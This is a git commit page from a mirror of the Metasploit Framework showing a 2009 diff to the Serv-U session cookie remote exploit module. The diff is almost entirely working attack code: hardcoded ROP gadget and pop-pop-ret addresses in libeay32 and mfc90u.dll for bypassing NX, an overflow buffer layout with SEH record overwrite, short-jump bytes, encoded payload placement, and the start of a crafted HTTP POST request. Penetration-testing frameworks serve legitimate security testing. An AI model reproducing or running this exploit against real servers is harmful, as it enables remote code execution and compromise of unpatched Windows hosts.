infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

confirmed SEH target works on Windows XP SP3 

git-svn-id: file:///home/svn/framework3/trunk@7576 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-11-21 17:44:09 +00:00
parent fcd7effcc6
commit b54a7aa1d3
1 changed files with 13 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/windows/http/servu_session_cookie.rb
View File

@ -14,6 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -53,20 +54,18 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
[ 'Windows 2003 SP2 English (NX)', [ 'Windows 2003 SP2 English (NX)',
{ {
'OS' => '2003SP2',
'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32 'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32
'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll 'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll
'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll 'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll
'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll 'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll
'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll 'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll
'JmpESP' => 0x78b2c753, # jmp esp @mfc90u.dll 'JmpESP' => 0x78b2c753 # jmp esp @mfc90u.dll
} }
], ],
[ 'Windows 2000 SP4 English', [ 'Windows 2000 SP4 and XP SP3 English (SEH)',
{ {
'OS' => '2000SP4', 'Ret' => 0x0fb870bd # pop pop ret @libeay32.dll
'Ret' => 0x0fb870bd, # pop pop ret @libeay32.dll
} }
], ],
], ],
@ -81,12 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
# hit end of stack.. # hit end of stack..
sploit = Rex::Text.rand_text(1000) * 75 sploit = Rex::Text.rand_text(1000) * 75
if (target['OS'] =~ /2003/) if (target.name =~ /NX/)
# new SEH handler (point esp into buffer) # new SEH handler (point esp into buffer)
sploit[41000,4] = [target['FixESP']].pack('V') sploit[41000,4] = [target['FixESP']].pack('V')
@ -101,11 +99,12 @@ class Metasploit3 < Msf::Exploit::Remote
sploit[52+24,2] = "\xeb\x20" sploit[52+24,2] = "\xeb\x20"
sploit[52+40,payload.encoded.length] = payload.encoded sploit[52+40,payload.encoded.length] = payload.encoded
elsif (target['OS'] =~ /2000/) else
sploit[41000-4,4] = "\xeb\x06\x90\x90" seh = generate_seh_record(target.ret)
sploit[41000,4] = [target['Ret']].pack("V") sploit[40996,seh.length] = seh
sploit[41004,payload.encoded.length] = payload.encoded sploit[41004,payload.encoded.length] = payload.encoded
end end
req = "POST / HTTP/1.1\r\n" req = "POST / HTTP/1.1\r\n"